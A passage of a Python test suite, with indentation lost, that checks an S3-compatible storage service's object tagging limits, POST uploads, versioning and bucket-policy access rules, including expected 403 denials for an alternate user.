bucket_name = _create_key_with_random_content(key)
client = get_client()
count = 2
input_tagset = _create_simple_tagset(count)
response = client.put_object_tagging(Bucket=bucket_name, Key=key, Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
response = client.head_object(Bucket=bucket_name, Key=key)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
eq(response['ResponseMetadata']['HTTPHeaders']['x-amz-tagging-count'], str(count))
@attr(resource='object')
@attr(method='get')
@attr(operation='Test Put max allowed tags')
@attr(assertion='success')
@attr('tagging')
def test_put_max_tags():
key = 'testputmaxtags'
bucket_name = _create_key_with_random_content(key)
client = get_client()
input_tagset = _create_simple_tagset(10)
response = client.put_object_tagging(Bucket=bucket_name, Key=key, Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
response = client.get_object_tagging(Bucket=bucket_name, Key=key)
eq(response['TagSet'], input_tagset['TagSet'])
@attr(resource='object')
@attr(method='get')
@attr(operation='Test Put max allowed tags')
@attr(assertion='fails')
@attr('tagging')
def test_put_excess_tags():
key = 'testputmaxtags'
bucket_name = _create_key_with_random_content(key)
client = get_client()
input_tagset = _create_simple_tagset(11)
e = assert_raises(ClientError, client.put_object_tagging, Bucket=bucket_name, Key=key, Tagging=input_tagset)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidTag')
response = client.get_object_tagging(Bucket=bucket_name, Key=key)
eq(len(response['TagSet']), 0)
@attr(resource='object')
@attr(method='get')
@attr(operation='Test Put max allowed k-v size')
@attr(assertion='success')
@attr('tagging')
def test_put_max_kvsize_tags():
key = 'testputmaxkeysize'
bucket_name = _create_key_with_random_content(key)
client = get_client()
tagset = []
for i in range(10):
k = _make_random_string(128)
v = _make_random_string(256)
tagset.append({'Key': k, 'Value': v})
input_tagset = {'TagSet': tagset}
response = client.put_object_tagging(Bucket=bucket_name, Key=key, Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
response = client.get_object_tagging(Bucket=bucket_name, Key=key)
for kv_pair in response['TagSet']:
eq((kv_pair in input_tagset['TagSet']), True)
@attr(resource='object')
@attr(method='get')
@attr(operation='Test exceed key size')
@attr(assertion='success')
@attr('tagging')
def test_put_excess_key_tags():
key = 'testputexcesskeytags'
bucket_name = _create_key_with_random_content(key)
client = get_client()
tagset = []
for i in range(10):
k = _make_random_string(129)
v = _make_random_string(256)
tagset.append({'Key': k, 'Value': v})
input_tagset = {'TagSet': tagset}
e = assert_raises(ClientError, client.put_object_tagging, Bucket=bucket_name, Key=key, Tagging=input_tagset)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidTag')
response = client.get_object_tagging(Bucket=bucket_name, Key=key)
eq(len(response['TagSet']), 0)
@attr(resource='object')
@attr(method='get')
@attr(operation='Test exceed val size')
@attr(assertion='success')
@attr('tagging')
def test_put_excess_val_tags():
key = 'testputexcesskeytags'
bucket_name = _create_key_with_random_content(key)
client = get_client()
tagset = []
for i in range(10):
k = _make_random_string(128)
v = _make_random_string(257)
tagset.append({'Key': k, 'Value': v})
input_tagset = {'TagSet': tagset}
e = assert_raises(ClientError, client.put_object_tagging, Bucket=bucket_name, Key=key, Tagging=input_tagset)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidTag')
response = client.get_object_tagging(Bucket=bucket_name, Key=key)
eq(len(response['TagSet']), 0)
@attr(resource='object')
@attr(method='get')
@attr(operation='Test PUT modifies existing tags')
@attr(assertion='success')
@attr('tagging')
def test_put_modify_tags():
key = 'testputmodifytags'
bucket_name = _create_key_with_random_content(key)
client = get_client()
tagset = []
tagset.append({'Key': 'key', 'Value': 'val'})
tagset.append({'Key': 'key2', 'Value': 'val2'})
input_tagset = {'TagSet': tagset}
response = client.put_object_tagging(Bucket=bucket_name, Key=key, Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
response = client.get_object_tagging(Bucket=bucket_name, Key=key)
eq(response['TagSet'], input_tagset['TagSet'])
tagset2 = []
tagset2.append({'Key': 'key3', 'Value': 'val3'})
input_tagset2 = {'TagSet': tagset2}
response = client.put_object_tagging(Bucket=bucket_name, Key=key, Tagging=input_tagset2)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
response = client.get_object_tagging(Bucket=bucket_name, Key=key)
eq(response['TagSet'], input_tagset2['TagSet'])
@attr(resource='object')
@attr(method='get')
@attr(operation='Test Delete tags')
@attr(assertion='success')
@attr('tagging')
def test_put_delete_tags():
key = 'testputmodifytags'
bucket_name = _create_key_with_random_content(key)
client = get_client()
input_tagset = _create_simple_tagset(2)
response = client.put_object_tagging(Bucket=bucket_name, Key=key, Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
response = client.get_object_tagging(Bucket=bucket_name, Key=key)
eq(response['TagSet'], input_tagset['TagSet'])
response = client.delete_object_tagging(Bucket=bucket_name, Key=key)
eq(response['ResponseMetadata']['HTTPStatusCode'], 204)
response = client.get_object_tagging(Bucket=bucket_name, Key=key)
eq(len(response['TagSet']), 0)
@attr(resource='object')
@attr(method='post')
@attr(operation='anonymous browser based upload via POST request')
@attr('tagging')
@attr(assertion='succeeds and returns written data')
def test_post_object_tags_anonymous_request():
bucket_name = get_new_bucket_name()
client = get_client()
url = _get_post_url(bucket_name)
client.create_bucket(ACL='public-read-write', Bucket=bucket_name)
key_name = "foo.txt"
input_tagset = _create_simple_tagset(2)
# xml_input_tagset is the same as input_tagset in xml.
# There is not a simple way to change input_tagset to xml like there is in the boto2 tetss
xml_input_tagset = "<Tagging><TagSet><Tag><Key>0</Key><Value>0</Value></Tag><Tag><Key>1</Key><Value>1</Value></Tag></TagSet></Tagging>"
payload = OrderedDict([
("key" , key_name),
("acl" , "public-read"),
("Content-Type" , "text/plain"),
("tagging", xml_input_tagset),
('file', ('bar')),
])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 204)
response = client.get_object(Bucket=bucket_name, Key=key_name)
body = _get_body(response)
eq(body, 'bar')
response = client.get_object_tagging(Bucket=bucket_name, Key=key_name)
eq(response['TagSet'], input_tagset['TagSet'])
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr('tagging')
@attr(assertion='succeeds and returns written data')
def test_post_object_tags_authenticated_request():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [
{"bucket": bucket_name},
["starts-with", "$key", "foo"],
{"acl": "private"},
["starts-with", "$Content-Type", "text/plain"],
["content-length-range", 0, 1024],
["starts-with", "$tagging", ""]
]}
# xml_input_tagset is the same as `input_tagset = _create_simple_tagset(2)` in xml
# There is not a simple way to change input_tagset to xml like there is in the boto2 tetss
xml_input_tagset = "<Tagging><TagSet><Tag><Key>0</Key><Value>0</Value></Tag><Tag><Key>1</Key><Value>1</Value></Tag></TagSet></Tagging>"
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([
("key" , "foo.txt"),
("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("tagging", xml_input_tagset),
("Content-Type" , "text/plain"),
('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 204)
response = client.get_object(Bucket=bucket_name, Key='foo.txt')
body = _get_body(response)
eq(body, 'bar')
@attr(resource='object')
@attr(method='put')
@attr(operation='Test PutObj with tagging headers')
@attr(assertion='success')
@attr('tagging')
def test_put_obj_with_tags():
bucket_name = get_new_bucket()
client = get_client()
key = 'testtagobj1'
data = 'A'*100
tagset = []
tagset.append({'Key': 'bar', 'Value': ''})
tagset.append({'Key': 'foo', 'Value': 'bar'})
put_obj_tag_headers = {
'x-amz-tagging' : 'foo=bar&bar'
}
lf = (lambda **kwargs: kwargs['params']['headers'].update(put_obj_tag_headers))
client.meta.events.register('before-call.s3.PutObject', lf)
client.put_object(Bucket=bucket_name, Key=key, Body=data)
response = client.get_object(Bucket=bucket_name, Key=key)
body = _get_body(response)
eq(body, data)
response = client.get_object_tagging(Bucket=bucket_name, Key=key)
response_tagset = response['TagSet']
tagset = tagset
eq(response_tagset, tagset)
def _make_arn_resource(path="*"):
return "arn:aws:s3:::{}".format(path)
@attr(resource='object')
@attr(method='get')
@attr(operation='Test GetObjTagging public read')
@attr(assertion='success')
@attr('tagging')
@attr('bucket-policy')
def test_get_tags_acl_public():
key = 'testputtagsacl'
bucket_name = _create_key_with_random_content(key)
client = get_client()
resource = _make_arn_resource("{}/{}".format(bucket_name, key))
policy_document = make_json_policy("s3:GetObjectTagging",
resource)
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
input_tagset = _create_simple_tagset(10)
response = client.put_object_tagging(Bucket=bucket_name, Key=key, Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
alt_client = get_alt_client()
response = alt_client.get_object_tagging(Bucket=bucket_name, Key=key)
eq(response['TagSet'], input_tagset['TagSet'])
@attr(resource='object')
@attr(method='get')
@attr(operation='Test PutObjTagging public wrote')
@attr(assertion='success')
@attr('tagging')
@attr('bucket-policy')
def test_put_tags_acl_public():
key = 'testputtagsacl'
bucket_name = _create_key_with_random_content(key)
client = get_client()
resource = _make_arn_resource("{}/{}".format(bucket_name, key))
policy_document = make_json_policy("s3:PutObjectTagging",
resource)
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
input_tagset = _create_simple_tagset(10)
alt_client = get_alt_client()
response = alt_client.put_object_tagging(Bucket=bucket_name, Key=key, Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
response = client.get_object_tagging(Bucket=bucket_name, Key=key)
eq(response['TagSet'], input_tagset['TagSet'])
@attr(resource='object')
@attr(method='get')
@attr(operation='test deleteobjtagging public')
@attr(assertion='success')
@attr('tagging')
@attr('bucket-policy')
def test_delete_tags_obj_public():
key = 'testputtagsacl'
bucket_name = _create_key_with_random_content(key)
client = get_client()
resource = _make_arn_resource("{}/{}".format(bucket_name, key))
policy_document = make_json_policy("s3:DeleteObjectTagging",
resource)
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
input_tagset = _create_simple_tagset(10)
response = client.put_object_tagging(Bucket=bucket_name, Key=key, Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
alt_client = get_alt_client()
response = alt_client.delete_object_tagging(Bucket=bucket_name, Key=key)
eq(response['ResponseMetadata']['HTTPStatusCode'], 204)
response = client.get_object_tagging(Bucket=bucket_name, Key=key)
eq(len(response['TagSet']), 0)
@attr(resource='object')
@attr(method='put')
@attr(operation='test whether a correct version-id returned')
@attr(assertion='version-id is same as bucket list')
@attr('versioning')
def test_versioning_bucket_atomic_upload_return_version_id():
bucket_name = get_new_bucket()
client = get_client()
key = 'bar'
# for versioning-enabled-bucket, an non-empty version-id should return
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
response = client.put_object(Bucket=bucket_name, Key=key)
version_id = response['VersionId']
response = client.list_object_versions(Bucket=bucket_name)
versions = response['Versions']
for version in versions:
eq(version['VersionId'], version_id)
# for versioning-default-bucket, no version-id should return.
bucket_name = get_new_bucket()
key = 'baz'
response = client.put_object(Bucket=bucket_name, Key=key)
eq(('VersionId' in response), False)
# for versioning-suspended-bucket, no version-id should return.
bucket_name = get_new_bucket()
key = 'baz'
check_configure_versioning_retry(bucket_name, "Suspended", "Suspended")
response = client.put_object(Bucket=bucket_name, Key=key)
eq(('VersionId' in response), False)
@attr(resource='object')
@attr(method='put')
@attr(operation='test whether a correct version-id returned')
@attr(assertion='version-id is same as bucket list')
@attr('versioning')
def test_versioning_bucket_multipart_upload_return_version_id():
content_type='text/bla'
objlen = 30 * 1024 * 1024
bucket_name = get_new_bucket()
client = get_client()
key = 'bar'
metadata={'foo': 'baz'}
# for versioning-enabled-bucket, an non-empty version-id should return
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
(upload_id, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key, size=objlen, client=client, content_type=content_type, metadata=metadata)
response = client.complete_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
version_id = response['VersionId']
response = client.list_object_versions(Bucket=bucket_name)
versions = response['Versions']
for version in versions:
eq(version['VersionId'], version_id)
# for versioning-default-bucket, no version-id should return.
bucket_name = get_new_bucket()
key = 'baz'
(upload_id, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key, size=objlen, client=client, content_type=content_type, metadata=metadata)
response = client.complete_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
eq(('VersionId' in response), False)
# for versioning-suspended-bucket, no version-id should return
bucket_name = get_new_bucket()
key = 'foo'
check_configure_versioning_retry(bucket_name, "Suspended", "Suspended")
(upload_id, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key, size=objlen, client=client, content_type=content_type, metadata=metadata)
response = client.complete_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
eq(('VersionId' in response), False)
@attr(resource='object')
@attr(method='get')
@attr(operation='Test ExistingObjectTag conditional on get object')
@attr(assertion='success')
@attr('tagging')
@attr('bucket-policy')
def test_bucket_policy_get_obj_existing_tag():
bucket_name = _create_objects(keys=['publictag', 'privatetag', 'invalidtag'])
client = get_client()
tag_conditional = {"StringEquals": {
"s3:ExistingObjectTag/security" : "public"
}}
resource = _make_arn_resource("{}/{}".format(bucket_name, "*"))
policy_document = make_json_policy("s3:GetObject",
resource,
conditions=tag_conditional)
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
tagset = []
tagset.append({'Key': 'security', 'Value': 'public'})
tagset.append({'Key': 'foo', 'Value': 'bar'})
input_tagset = {'TagSet': tagset}
response = client.put_object_tagging(Bucket=bucket_name, Key='publictag', Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
tagset2 = []
tagset2.append({'Key': 'security', 'Value': 'private'})
input_tagset = {'TagSet': tagset2}
response = client.put_object_tagging(Bucket=bucket_name, Key='privatetag', Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
tagset3 = []
tagset3.append({'Key': 'security1', 'Value': 'public'})
input_tagset = {'TagSet': tagset3}
response = client.put_object_tagging(Bucket=bucket_name, Key='invalidtag', Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
alt_client = get_alt_client()
response = alt_client.get_object(Bucket=bucket_name, Key='publictag')
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
e = assert_raises(ClientError, alt_client.get_object, Bucket=bucket_name, Key='privatetag')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
e = assert_raises(ClientError, alt_client.get_object, Bucket=bucket_name, Key='invalidtag')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
@attr(resource='object')
@attr(method='get')
@attr(operation='Test ExistingObjectTag conditional on get object tagging')
@attr(assertion='success')
@attr('tagging')
@attr('bucket-policy')
def test_bucket_policy_get_obj_tagging_existing_tag():
bucket_name = _create_objects(keys=['publictag', 'privatetag', 'invalidtag'])
client = get_client()
tag_conditional = {"StringEquals": {
"s3:ExistingObjectTag/security" : "public"
}}
resource = _make_arn_resource("{}/{}".format(bucket_name, "*"))
policy_document = make_json_policy("s3:GetObjectTagging",
resource,
conditions=tag_conditional)
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
tagset = []
tagset.append({'Key': 'security', 'Value': 'public'})
tagset.append({'Key': 'foo', 'Value': 'bar'})
input_tagset = {'TagSet': tagset}
response = client.put_object_tagging(Bucket=bucket_name, Key='publictag', Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
tagset2 = []
tagset2.append({'Key': 'security', 'Value': 'private'})
input_tagset = {'TagSet': tagset2}
response = client.put_object_tagging(Bucket=bucket_name, Key='privatetag', Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
tagset3 = []
tagset3.append({'Key': 'security1', 'Value': 'public'})
input_tagset = {'TagSet': tagset3}
response = client.put_object_tagging(Bucket=bucket_name, Key='invalidtag', Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
alt_client = get_alt_client()
response = alt_client.get_object_tagging(Bucket=bucket_name, Key='publictag')
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
# A get object itself should fail since we allowed only GetObjectTagging
e = assert_raises(ClientError, alt_client.get_object, Bucket=bucket_name, Key='publictag')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
e = assert_raises(ClientError, alt_client.get_object_tagging, Bucket=bucket_name, Key='privatetag')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
e = assert_raises(ClientError, alt_client.get_object_tagging, Bucket=bucket_name, Key='invalidtag')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
@attr(resource='object')
@attr(method='get')
@attr(operation='Test ExistingObjectTag conditional on put object tagging')
@attr(assertion='success')
@attr('tagging')
@attr('bucket-policy')
def test_bucket_policy_put_obj_tagging_existing_tag():
bucket_name = _create_objects(keys=['publictag', 'privatetag', 'invalidtag'])
client = get_client()
tag_conditional = {"StringEquals": {
"s3:ExistingObjectTag/security" : "public"
}}
resource = _make_arn_resource("{}/{}".format(bucket_name, "*"))
policy_document = make_json_policy("s3:PutObjectTagging",
resource,
conditions=tag_conditional)
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
tagset = []
tagset.append({'Key': 'security', 'Value': 'public'})
tagset.append({'Key': 'foo', 'Value': 'bar'})
input_tagset = {'TagSet': tagset}
response = client.put_object_tagging(Bucket=bucket_name, Key='publictag', Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
tagset2 = []
tagset2.append({'Key': 'security', 'Value': 'private'})
input_tagset = {'TagSet': tagset2}
response = client.put_object_tagging(Bucket=bucket_name, Key='privatetag', Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
alt_client = get_alt_client()
# PUT requests with object tagging are a bit wierd, if you forget to put
# the tag which is supposed to be existing anymore well, well subsequent
# put requests will fail
testtagset1 = []
testtagset1.append({'Key': 'security', 'Value': 'public'})
testtagset1.append({'Key': 'foo', 'Value': 'bar'})
input_tagset = {'TagSet': testtagset1}
response = alt_client.put_object_tagging(Bucket=bucket_name, Key='publictag', Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
e = assert_raises(ClientError, alt_client.put_object_tagging, Bucket=bucket_name, Key='privatetag', Tagging=input_tagset)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
testtagset2 = []
testtagset2.append({'Key': 'security', 'Value': 'private'})
input_tagset = {'TagSet': testtagset2}
response = alt_client.put_object_tagging(Bucket=bucket_name, Key='publictag', Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
# Now try putting the original tags again, this should fail
input_tagset = {'TagSet': testtagset1}
e = assert_raises(ClientError, alt_client.put_object_tagging, Bucket=bucket_name, Key='publictag', Tagging=input_tagset)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
@attr(resource='object')
@attr(method='put')
@attr(operation='Test copy-source conditional on put obj')
@attr(assertion='success')
@attr('tagging')
@attr('bucket-policy')
def test_bucket_policy_put_obj_copy_source():
bucket_name = _create_objects(keys=['public/foo', 'public/bar', 'private/foo'])
client = get_client()
src_resource = _make_arn_resource("{}/{}".format(bucket_name, "*"))
policy_document = make_json_policy("s3:GetObject",
src_resource)
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
bucket_name2 = get_new_bucket()
tag_conditional = {"StringLike": {
"s3:x-amz-copy-source" : bucket_name + "/public/*"
}}
resource = _make_arn_resource("{}/{}".format(bucket_name2, "*"))
policy_document = make_json_policy("s3:PutObject",
resource,
conditions=tag_conditional)
client.put_bucket_policy(Bucket=bucket_name2, Policy=policy_document)
alt_client = get_alt_client()
copy_source = {'Bucket': bucket_name, 'Key': 'public/foo'}
alt_client.copy_object(Bucket=bucket_name2, CopySource=copy_source, Key='new_foo')
# This is possible because we are still the owner, see the grants with
# policy on how to do this right
response = alt_client.get_object(Bucket=bucket_name2, Key='new_foo')
body = _get_body(response)
eq(body, 'public/foo')
copy_source = {'Bucket': bucket_name, 'Key': 'public/bar'}
alt_client.copy_object(Bucket=bucket_name2, CopySource=copy_source, Key='new_foo2')
response = alt_client.get_object(Bucket=bucket_name2, Key='new_foo2')
body = _get_body(response)
eq(body, 'public/bar')
copy_source = {'Bucket': bucket_name, 'Key': 'private/foo'}
check_access_denied(alt_client.copy_object, Bucket=bucket_name2, CopySource=copy_source, Key='new_foo2')
@attr(resource='object')
@attr(method='put')
@attr(operation='Test copy-source conditional on put obj')
@attr(assertion='success')
@attr('tagging')
@attr('bucket-policy')
def test_bucket_policy_put_obj_copy_source_meta():
src_bucket_name = _create_objects(keys=['public/foo', 'public/bar'])
client = get_client()
src_resource = _make_arn_resource("{}/{}".format(src_bucket_name, "*"))
policy_document = make_json_policy("s3:GetObject",
src_resource)
client.put_bucket_policy(Bucket=src_bucket_name, Policy=policy_document)
bucket_name = get_new_bucket()
tag_conditional = {"StringEquals": {
"s3:x-amz-metadata-directive" : "COPY"
}}
resource = _make_arn_resource("{}/{}".format(bucket_name, "*"))
policy_document = make_json_policy("s3:PutObject",
resource,
conditions=tag_conditional)
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
alt_client = get_alt_client()
lf = (lambda **kwargs: kwargs['params']['headers'].update({"x-amz-metadata-directive": "COPY"}))
alt_client.meta.events.register('before-call.s3.CopyObject', lf)
copy_source = {'Bucket': src_bucket_name, 'Key': 'public/foo'}
alt_client.copy_object(Bucket=bucket_name, CopySource=copy_source, Key='new_foo')
# This is possible because we are still the owner, see the grants with
# policy on how to do this right
response = alt_client.get_object(Bucket=bucket_name, Key='new_foo')
body = _get_body(response)
eq(body, 'public/foo')
# remove the x-amz-metadata-directive header
def remove_header(**kwargs):
if ("x-amz-metadata-directive" in kwargs['params']['headers']):
del kwargs['params']['headers']["x-amz-metadata-directive"]
alt_client.meta.events.register('before-call.s3.CopyObject', remove_header)
copy_source = {'Bucket': src_bucket_name, 'Key': 'public/bar'}
check_access_denied(alt_client.copy_object, Bucket=bucket_name, CopySource=copy_source, Key='new_foo2', Metadata={"foo": "bar"})
@attr(resource='object')
@attr(method='put')
@attr(operation='Test put obj with canned-acl not to be public')
@attr(assertion='success')
@attr('tagging')
@attr('bucket-policy')
def test_bucket_policy_put_obj_acl():
bucket_name = get_new_bucket()
client = get_client()
# An allow conditional will require atleast the presence of an x-amz-acl
# attribute a Deny conditional would negate any requests that try to set a
# public-read/write acl
conditional = {"StringLike": {
"s3:x-amz-acl" : "public*"
}}
p = Policy()
resource = _make_arn_resource("{}/{}".format(bucket_name, "*"))
s1 = Statement("s3:PutObject",resource)
s2 = Statement("s3:PutObject", resource, effect="Deny", condition=conditional)
policy_document = p.add_statement(s1).add_statement(s2).to_json()
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
alt_client = get_alt_client()
key1 = 'private-key'
# if we want to be really pedantic, we should check that this doesn't raise
# and mark a failure, however if this does raise nosetests would mark this
# as an ERROR anyway
response = alt_client.put_object(Bucket=bucket_name, Key=key1, Body=key1)
#response = alt_client.put_object_acl(Bucket=bucket_name, Key=key1, ACL='private')
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
key2 = 'public-key'
lf = (lambda **kwargs: kwargs['params']['headers'].update({"x-amz-acl": "public-read"}))
alt_client.meta.events.register('before-call.s3.PutObject', lf)
e = assert_raises(ClientError, alt_client.put_object, Bucket=bucket_name, Key=key2, Body=key2)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
@attr(resource='object')
@attr(method='put')
@attr(operation='Test put obj with amz-grant back to bucket-owner')
@attr(assertion='success')
@attr('bucket-policy')
def test_bucket_policy_put_obj_grant():
bucket_name = get_new_bucket()
bucket_name2 = get_new_bucket()
client = get_client()
# In normal cases a key owner would be the uploader of a key in first case
# we explicitly require that the bucket owner is granted full control over
# the object uploaded by any user, the second bucket is where no such
# policy is enforced meaning that the uploader still retains ownership
main_user_id = get_main_user_id()
alt_user_id = get_alt_user_id()
owner_id_str = "id=" + main_user_id
s3_conditional = {"StringEquals": {
"s3:x-amz-grant-full-control" : owner_id_str
}}
resource = _make_arn_resource("{}/{}".format(bucket_name, "*"))
policy_document = make_json_policy("s3:PutObject",
resource,
conditions=s3_conditional)
resource = _make_arn_resource("{}/{}".format(bucket_name2, "*"))
policy_document2 = make_json_policy("s3:PutObject", resource)
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
client.put_bucket_policy(Bucket=bucket_name2, Policy=policy_document2)
alt_client = get_alt_client()
key1 = 'key1'
lf = (lambda **kwargs: kwargs['params']['headers'].update({"x-amz-grant-full-control" : owner_id_str}))
alt_client.meta.events.register('before-call.s3.PutObject', lf)
response = alt_client.put_object(Bucket=bucket_name, Key=key1, Body=key1)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
def remove_header(**kwargs):
if ("x-amz-grant-full-control" in kwargs['params']['headers']):
del kwargs['params']['headers']["x-amz-grant-full-control"]
alt_client.meta.events.register('before-call.s3.PutObject', remove_header)
key2 = 'key2'
response = alt_client.put_object(Bucket=bucket_name2, Key=key2, Body=key2)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
acl1_response = client.get_object_acl(Bucket=bucket_name, Key=key1)
# user 1 is trying to get acl for the object from user2 where ownership
# wasn't transferred
check_access_denied(client.get_object_acl, Bucket=bucket_name2, Key=key2)
acl2_response = alt_client.get_object_acl(Bucket=bucket_name2, Key=key2)
eq(acl1_response['Grants'][0]['Grantee']['ID'], main_user_id)
eq(acl2_response['Grants'][0]['Grantee']['ID'], alt_user_id)
@attr(resource='object')
@attr(method='put')
@attr(operation='Deny put obj requests without encryption')
@attr(assertion='success')
@attr('encryption')
@attr('bucket-policy')
# TODO: remove this 'fails_on_rgw' once I get the test passing
@attr('fails_on_rgw')
def test_bucket_policy_put_obj_enc():
bucket_name = get_new_bucket()
client = get_v2_client()
deny_incorrect_algo = {
"StringNotEquals": {
"s3:x-amz-server-side-encryption": "AES256"
}
}
deny_unencrypted_obj = {
"Null" : {
"s3:x-amz-server-side-encryption": "true"
}
}
p = Policy()
resource = _make_arn_resource("{}/{}".format(bucket_name, "*"))
s1 = Statement("s3:PutObject", resource, effect="Deny", condition=deny_incorrect_algo)
s2 = Statement("s3:PutObject", resource, effect="Deny", condition=deny_unencrypted_obj)
policy_document = p.add_statement(s1).add_statement(s2).to_json()
boto3.set_stream_logger(name='botocore')
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
key1_str ='testobj'
#response = client.get_bucket_policy(Bucket=bucket_name)
#print response
check_access_denied(client.put_object, Bucket=bucket_name, Key=key1_str, Body=key1_str)
sse_client_headers = {
'x-amz-server-side-encryption' : 'AES256',
'x-amz-server-side-encryption-customer-algorithm': 'AES256',
'x-amz-server-side-encryption-customer-key': 'pO3upElrwuEXSoFwCfnZPdSsmt/xWeFa0N9KgDijwVs=',
'x-amz-server-side-encryption-customer-key-md5': 'DWygnHRtgiJ77HCm+1rvHw=='
}
lf = (lambda **kwargs: kwargs['params']['headers'].update(sse_client_headers))
client.meta.events.register('before-call.s3.PutObject', lf)
#TODO: why is this a 400 and not passing, it appears boto3 is not parsing the 200 response the rgw sends back properly
# DEBUGGING: run the boto2 and compare the requests
# DEBUGGING: try to run this with v2 auth (figure out why get_v2_client isn't working) to make the requests similar to what boto2 is doing
# DEBUGGING: try to add other options to put_object to see if that makes the response better
client.put_object(Bucket=bucket_name, Key=key1_str)
@attr(resource='object')
@attr(method='put')
@attr(operation='put obj with RequestObjectTag')
@attr(assertion='success')
@attr('tagging')
@attr('bucket-policy')
# TODO: remove this fails_on_rgw when I fix it
@attr('fails_on_rgw')
def test_bucket_policy_put_obj_request_obj_tag():
bucket_name = get_new_bucket()
client = get_client()
tag_conditional = {"StringEquals": {
"s3:RequestObjectTag/security" : "public"
}}
p = Policy()
resource = _make_arn_resource("{}/{}".format(bucket_name, "*"))
s1 = Statement("s3:PutObject", resource, effect="Allow", condition=tag_conditional)
policy_document = p.add_statement(s1).to_json()
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
alt_client = get_alt_client()
key1_str ='testobj'
check_access_denied(alt_client.put_object, Bucket=bucket_name, Key=key1_str, Body=key1_str)
headers = {"x-amz-tagging" : "security=public"}
lf = (lambda **kwargs: kwargs['params']['headers'].update(headers))
client.meta.events.register('before-call.s3.PutObject', lf)
#TODO: why is this a 400 and not passing
alt_client.put_object(Bucket=bucket_name, Key=key1_str, Body=key1_str)
@attr(resource='object')
@attr(method='get')
@attr(operation='Test ExistingObjectTag conditional on get object acl')
@attr(assertion='success')
@attr('tagging')
@attr('bucket-policy')
def test_bucket_policy_get_obj_acl_existing_tag():
bucket_name = _create_objects(keys=['publictag', 'privatetag', 'invalidtag'])
client = get_client()
tag_conditional = {"StringEquals": {
"s3:ExistingObjectTag/security" : "public"
}}
